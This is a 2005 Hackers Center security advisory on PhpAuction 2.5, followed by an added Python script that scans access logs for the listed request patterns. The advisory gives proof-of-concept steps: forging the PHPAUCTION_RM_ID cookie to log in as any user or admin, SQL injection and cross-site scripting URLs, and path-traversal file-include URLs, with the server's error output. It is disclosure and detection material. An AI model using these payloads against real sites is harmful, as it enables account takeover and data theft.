HSC Research Group - Advisories
Written by Hackers Center
Thursday, 07 July 2005 15:14
Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
****************************** SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO
******************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: PhpAuction has Authentication Bypass, Multiple SQL Injection, Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are authentication bypass, multiple SQL injection, cross site scripting and file include vulnerabilities in PhpAuction.
Proof of Concept Exploits:
Authentication bypass
Set the cookie as follows:
Name: PHPAUCTION_RM_ID
Value: ID number of the user/admin you want to impersonate (you can get it from their profile)
Access the website, and you're instantly logged in as them ;)
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php on line 33
/viewnews.php?id='SQL_INJECTION
Error: select * from PROSITE_news where id='SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''SQL_INJECTION' at line 1
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script> Cross Site Scripting
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script> Cross Site Scripting
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159 Cross Site Scripting
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script> Cross Site Scripting
/login.php?username=<script>alert(document.cookie)</script> Cross Site Scripting
/viewnews.php?id=<script>alert(document.cookie)</script> Cross Site Scripting
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Keep yourself updated. RSS feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon to come out book on secure coding with PHP.
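A log-review example for the request patterns listed in this advisory, added here and not part of the original advisory or of PhpAuction's code. It assumes combined-format access logs, that id, auction_id, user_id and category normally carry integers, and that lan carries a short language code such as EN; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory. Expected value shapes are assumptions.
NUMERIC = {"id", "auction_id", "user_id", "category"}  # assumed integer ids
LANG = {"lan"}                                         # assumed short language code
MARKUP = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return sorted findings for one request URL (one finding per parameter)."""
    findings = set()
    # parse_qsl percent-decodes values, so %3Cscript%3E is inspected as <script>
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.add(f"xss:{name}")
        elif name in NUMERIC and value and not re.fullmatch(r"[0-9]+", value):
            findings.add(f"sqli:{name}")
        elif name in LANG and (".." in value or "/" in value or "\\" in value):
            findings.add(f"file-include:{name}")
    return sorted(findings)

def scan(lines):
    """Return (line_number, path, findings) for each log line with findings."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we can parse
        found = classify(match.group(1))
        if found:
            hits.append((number, urlsplit(match.group(1)).path, found))
    return hits

# Constructed sample lines; 192.0.2.0/24 is documentation address space.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2005:10:00:01 +0000] "GET /phpauction-gpl-2.5/index.php?lan=EN HTTP/1.1" 200 5120',
    '192.0.2.11 - - [08/Jul/2005:10:00:07 +0000] "GET /viewnews.php?id=%27SQL_INJECTION HTTP/1.1" 200 312',
    '192.0.2.11 - - [08/Jul/2005:10:00:09 +0000] "GET /phpauction-gpl-2.5/profile.php?user_id=158&auction_id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096',
    '192.0.2.12 - - [08/Jul/2005:10:00:15 +0000] "GET /phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here HTTP/1.1" 200 620',
]

if __name__ == "__main__":
    for number, path, found in scan(SAMPLE_LOG):
        print(f"line {number}: {path} -> {', '.join(found)}")
```

The PHPAUCTION_RM_ID cookie issue is not visible in a default access log, since cookies are not recorded there; reviewing it needs cookie logging enabled on the server.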